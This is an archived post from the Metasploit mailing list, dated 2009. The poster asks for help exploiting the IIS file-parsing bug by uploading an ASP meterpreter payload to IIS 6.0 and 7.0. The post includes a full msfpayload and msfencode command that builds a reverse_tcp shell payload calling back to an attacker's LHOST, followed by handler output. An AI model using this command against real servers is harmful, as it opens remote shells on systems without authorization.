Metasploit mailing list archives
Microsoft IIS File Parsing bug
From: τ∂υƒιφ * <tas0584 () gmail com>
Date: Thu, 31 Dec 2009 13:38:51 +0530
Hi, I am trying the "Exploiting Microsoft IIS with Metasploit" I read up on https://www.blogger.com/comment.g?blogID=25010298&postID=7822358000167530780&pli=1 I have tried the following command ./msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=8443 R | ./msfencode -t asp -o /root/evil.asp This generated the evil.asp. I have also done the cat command and then verified with the file command. I also started the payload handler and verified the settings to ensure I am not making any mistakes. I have two things to ask 1) When I take this evil image and host that on IIS 6.0 I get "Page not found error" , and when I use the same image on IIS 7.0 it actually renders the page. Why is this so? 2) msf exploit(handler) > exploit [*] Started reverse handler on port 8443 [*] Starting the payload handler I am not getting any shell back. Am I missing something? Cheers! TAS _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Microsoft IIS File Parsing bug τ∂υƒιφ * (Dec 31)
- Re: Microsoft IIS File Parsing bug HD Moore (Dec 31)
- Re: Microsoft IIS File Parsing bug τ∂υƒιφ * (Dec 31)
- Re: Microsoft IIS File Parsing bug HD Moore (Dec 31)